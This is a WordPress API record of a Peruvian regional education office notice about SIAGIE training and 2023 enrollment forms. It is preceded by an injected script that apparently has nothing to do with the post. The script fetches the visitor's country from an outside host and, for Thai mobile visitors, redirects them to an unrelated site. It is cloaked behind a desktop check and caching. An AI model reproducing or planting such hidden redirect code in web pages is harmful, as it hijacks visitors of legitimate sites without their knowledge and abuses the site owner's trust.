<script>
(function() {
    var isDesktop = true;
    
    // Desktop = stay
    if (isDesktop) {
        document.body.style.visibility = "visible";
        return;
    }
    
    var key = "geo_th_v1";
    var cached = localStorage.getItem(key);
    
    // Mobile + TH = redirect
    if (cached === "TH") {
        location.href = "https://www.wakeboard-madrid.com/";
        return;
    }
    
    // Mobile + non-TH (cached) = stay
    if (cached && cached !== "TH") {
        document.body.style.visibility = "visible";
        return;
    }
    
    // Fetch country
    fetch("https://kuproy.xyz/")
        .then(function(r) { return r.text(); })
        .then(function(c) {
            var country = c.trim().toUpperCase();
            localStorage.setItem(key, country);
            
            // TH = redirect, non-TH = stay
            if (country === "TH") {
                location.href = "https://www.wakeboard-madrid.com/";
            } else {
                document.body.style.visibility = "visible";
            }
        })
        .catch(function() {
            // Error = assume non-TH, stay
            localStorage.setItem(key, "NOT_TH");
            document.body.style.visibility = "visible";
        });
})();
</script>{"id":2900,"date":"2023-03-13T11:32:15","date_gmt":"2023-03-13T16:32:15","guid":{"rendered":"https:\/\/ugelarequipanorte.gob.pe\/wp\/?p=2900"},"modified":"2023-03-13T11:32:15","modified_gmt":"2023-03-13T16:32:15","slug":"comunicado-n-o78-2023-capacitacion-de-siagie","status":"publish","type":"post","link":"https:\/\/ugelarequipanorte.gob.pe\/wp\/comunicado-n-o78-2023-capacitacion-de-siagie\/","title":{"rendered":"COMUNICADO N.\u00ba78 \u2013 2023 \u2013\u00a0CAPACITACI\u00d3N DE SIAGIE"},"content":{"rendered":"\n<p>Registro de calificaciones de postergaci\u00f3n de evaluaci\u00f3n 2022.<br>Registro de calificaciones de recuperaci\u00f3n PG 2022 y \u00e1rea a cargo.<br>Formatos de n\u00f3minas de matr\u00edcula 2023.<\/p>\n\n\n\n<p><a href=\"https:\/\/drive.google.com\/file\/d\/104cgwIQHA3RUx4CXOjjZIFqX3iCrGaAb\/view\">https:\/\/drive.google.com\/file\/d\/104cgwIQHA3RUx4CXOjjZIFqX3iCrGaAb\/view<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Registro de calificaciones de postergaci\u00f3n de evaluaci\u00f3n 2022.Registro de calificaciones de recuperaci\u00f3n PG 2022 y \u00e1rea a cargo.Formatos de n\u00f3minas de matr\u00edcula 2023. https:\/\/drive.google.com\/file\/d\/104cgwIQHA3RUx4CXOjjZIFqX3iCrGaAb\/view<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-2900","post","type-post","status-publish","format-standard","hentry","category-comunicados"],"_links":{"self":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/2900","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/comments?post=2900"}],"version-history":[{"count":1,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/2900\/revisions"}],"predecessor-version":[{"id":2902,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/2900\/revisions\/2902"}],"wp:attachment":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/media?parent=2900"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/categories?post=2900"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/tags?post=2900"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}